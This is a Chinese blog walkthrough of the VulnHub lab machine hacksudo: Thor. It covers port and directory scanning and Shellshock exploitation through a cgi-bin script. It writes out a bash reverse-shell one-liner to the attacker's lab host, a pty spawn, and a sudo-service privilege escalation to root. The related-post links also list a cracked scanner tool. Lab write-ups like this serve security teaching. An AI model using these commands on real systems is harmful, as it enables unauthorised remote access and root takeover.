Vulnhub_HACKSUDO: THOR

最新推荐文章于 2024-02-11 22:49:21 发布
最新推荐文章于 2024-02-11 22:49:21 发布
阅读量718 收藏 1
点赞数
文章标签: 安全 nginx 信息安全 linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/120108544
版权


本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.3.39
nivek:192.168.3.38

信息收集

使用nmap探测目标主机发现只开放了21、22、80三个端口

nmap -T4 -A -v -p- 192.168.3.38


访问80端口发现是一个登录页面

查看了网页中的源码没有发现可用的信息

在About-Us中得到了一些联系方式

通过目录扫描发现了一个cgi-bin的目录

dirb http://192.168.3.38 /usr/share/wordlists/dirb/big.txt


然后扫描cgi-bin下的可执行脚本,发现一个shell.sh

dirb http://192.168.3.38/cgi-bin/ -X .sh

GETSHELL

我们利用msf的检测模块验证存在shellshok漏洞

然后利用攻击模块获取shell

查看获取的shell权限发现是www权限

通过bash将msf的shell反弹到本机

bash -c 'bash -i >& /dev/tcp/192.168.3.39/4444 0>&1'


执行sudo -l发现有一个脚本可以以thor用户无密码用root身份执行

然后我们用python获取一个tty shell

python3 -c 'import pty; pty.spawn("/bin/bash");'


接着以thor身份执行脚本

获取thor身份的shell

获取thor的tty shell

提权

再执行sudo -l发现有cat、service可以利用

使用service提权至root

sudo service ../../bin/sh


进入root查看flag

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
osx_provision:用于为 RubyRails 开发提供 Macbook 计算机初始设置的库和 thor 任务
06-06
用于为 Ruby/Rails 开发提供 MacBook 计算机初始设置的库和 thor 任务 将此行添加到应用程序的 Gemfile 中: gem ' osx_provision ' 然后执行: bundle 或者自己安装: gem install osx_provision 用法 初始...
543个thor规则_thor规则_thor_Thor过滤器_543个thor_543个thor规则_
09-30
"543个thor规则"是一个专门针对网络流量监控和安全防护的规则集,它在IT领域,尤其是网络安全管理中扮演着重要角色。"thor"通常指的是THOR(Threat Hunting Operations and Response),这是一个高级威胁检测和响应...
VulnHUb日记(十):Hacksudo:Thor
Dawn_Xi的博客
09-27 1195
靶机介绍 虚拟机链接:hacksudo: Thor ~ VulnHub 参考博客:Hacksudo Thor Walkthrough - Vulnhub - Security - NepCodeX 开始练习 本机ip:192.168.56.102 虚拟机ip:192.168.56.124 使用netdiscover寻找ip地址 netdiscover -r 192.168.56.0/24 使用nmap扫描开放端口 nmap -A 192.168.56.124 开放21,..
vulnhubhacksudo:Thor
weixin_54431413的博客
05-24 569
前期:主机发现端口扫描,服务版本探测, 中期:信息收集,通过源码发现管理员默认密码,发现逻辑漏洞,sql注入等 后期:通过cgi程序利用破壳漏洞成功突破边界,最后利用一些命令配置不当实现成功提权。 此篇最重要的一点就是破壳漏洞和系统逻辑漏洞, 要迟到了,上课去了
hacksudo-ThorVulnhub
wcl20010的博客
05-26 687
靶机地址:hacksudo: Thor ~ VulnHub 利用的技术 shellshock破壳漏洞<–cgi-bin–> GTFOBins提权 github开源源码泄露 什么是破壳漏洞? bash环境变量 var="hello world" //一个简单的环境变量 =前后不能有空格 使用它输入命令: echo $var //输出就是你定义的内容 如果此时再输入bash 那么得到的就是bash的子进程 -》var就不能访问了:echo $var 子进程可以访问
靶机渗透练习96-hacksudoThor
hirak0的博客
05-09 1630
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-thor,733/ Description Box created by vishal Waghmare This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server ( https://discord.gg/kDyAKtJs ) Website (https://hacksud
serialize_sample:序列化样本
04-11
insert into person (category, name) values ( ' animal ' , ' Thor ' ); ps:您可能需要更改application.properties 。 主要是数据库连接的用户名和密码 spring.datasource.url = spring.datasource.username = ...
night_writer:“夜人科米特”
03-06
9. **命令行界面**:由于没有明确提到GUI,"night_writer"可能通过命令行接口与用户交互,利用Ruby的CLI工具如Thor或Optimist来处理命令行参数。 10. **文件操作**:作为程序,"night_writer"可能涉及到读写文件,...
thor:Thor是我们公司的机器人
07-18
您可以通过运行以下命令在本地启动 Thor: % bin/hubot 你会看到一些关于你的脚本来自哪里的启动输出和一个提示: [Sun, 04 Dec 2011 18:41:11 GMT] INFO Loading adapter shell [Sun, 04 Dec 2011 18:41:11 ...
vulnhub -- hacksudo: Thor
weixin_46107179的博客
05-06 310
靶机下载地址:下载链接 这里通过arp-scan -l来发现主机,主机IP地址:10.0.2.7 信息搜集 namp对IP地址进行端口扫描(开放21,22,82端口) 通过80端口访问,首页是一个登录页面,尝试用弱密码进行登录一下,发现不能登录成功 接着访问一下其他页面,发现concat下有一些基本信息(可以搜集尝试登录,但无果),其他页面也没有什么有用信息 接下来用dirsearch进行目录扫描,可以发现有一些文件可以访问 README.md以及还有一个后台登录页面 查看README.md文件,发
vulnhub靶场-hacksudo - Thor
qq_42947816的博客
06-30 984
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Vulnhub_hacksudo-search
qq_45434762的博客
05-09 915
主机信息kali: 192.168.1.10 hacksudo-search: 192.168.1.9 信息收集通过信息收集发信目标追击开发22、80两个端口nmap -T4 -A -v ...
VnlnHub hacksudo-Thor
weixin_45682839的博客
10-08 484
涉及知识包括:端口服务探测、敏感目录收集、后台弱口令、SQL注入、逻辑漏洞、破壳漏洞、linux本地提权等。
vulnhub-->hacksudo-Thor靶机详细思路
最新发布
woshicainiao666的博客
02-11 854
Shellshock漏洞的原因是Bash解释器在处理特定的环境变量时存在一个安全漏洞,攻击者可以通过构造恶意的环境变量来执行任意的Shell命令。破壳漏洞(Shellshock)是指一个影响Unix和Linux操作系统的严重安全漏洞,它影响了Bash命令解释器。该漏洞使攻击者能够在受影响的系统上执行任意代码,从而可能导致系统被入侵。sudo -l 发现可执行文件/home/thor/./hammer.sh,执行,发现输入的命令,会以thor用户执行,所以执行bash,以Thor用户新开一个bash环境。
自定义实现远程登入某台未设置无密码访问的机子
笨字第1号
03-21 1072
有时候集群外的机子需要临时登入测试集群查看某台机子的状况, 又不想频繁输入用户名密码,则可以参考以下例子.使用expect实现. 用法示例1: ./login.sh                                                           (登入default_host的test用户) 用法示例2: ./login.sh 192.168.3.38
Windows下使用Nginx实现实现Tomcat集群负载均衡
zengwende的博客
01-25 441
前言   本文章的目的旨在使用Nginx解决高并发情况下的负载均衡问题,也就是通常我们所说的集群。 读前准备   本文章涉及nginx的一些知识内容,以及正向代理和反向代理的概念理解,这些知识可参考我的博客里Nginx分类模块的内容。   我的博客关于nginx的内容地址为:https://blog.csdn.net/zengwende/article/category/8635956 解决...
批处理|测试工具|局域网速度测试/网络上传与下载速度测试
HRD的博客
12-02 8452
批处理实现局域网速度测试/网络上传与下载速度测试 用于检测WIFI模块或者局域网的传输速度 文末可免费下载完整版源码文件 使用方法 将以下代码复制后,保存为*.bat批处理文件即可执行;或者新建一个记事本文件,将复制的代码粘贴进去,然后将文件名后缀改为*.bat,双击即可执行; 测试思路 1.服务器和待测试设备需要在同一个局域网下面,即连接在同一个路由器; 2.服务器端设置为PC,客户端为安卓设备,可以测试下载速度; 3.服务器端设置为安卓设备,客户端为PC,可以...
thor 1.5.0 ipa
08-27
Thor 1.5.0是一款独立的iOS应用程序(IPA格式),用于管理和优化iPhone和iPad的系统。它提供了一系列功能,帮助用户更好地管理他们的设备并提高其性能。 Thor 1.5.0的一项主要功能是内存清理。它可以扫描设备上的内存使用情况,并清理不再使用的数据,以释放内存空间,从而提高设备的速度和响应能力。内存清理还能够减少应用程序的崩溃频率,提升设备的稳定性。 此外,Thor 1.5.0还提供了网络连接优化功能。它可以检测并排查设备上的网络问题,并自动修复连接错误,以确保设备能够更好地连接到互联网和其他设备。这可以提高用户的网络体验,使他们能够更快地加载网页、流畅地播放视频和音乐等。 Thor 1.5.0还具备电池管理功能。它可以监控设备上各个应用程序的电池消耗情况,并提供相应的建议和优化策略,以延长设备的电池续航时间。这对于经常使用移动设备的用户来说非常有用,可以让他们在外出或旅行时更长时间地使用设备而不用担心电池耗尽。 总之,Thor 1.5.0是一款功能强大的iOS应用程序,它通过内存清理、网络连接优化和电池管理等功能,帮助用户更好地管理和优化他们的iPhone和iPad设备。无论是提升设备的速度和性能,还是延长电池续航时间,Thor 1.5.0都能给用户带来极大的便利和实用价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值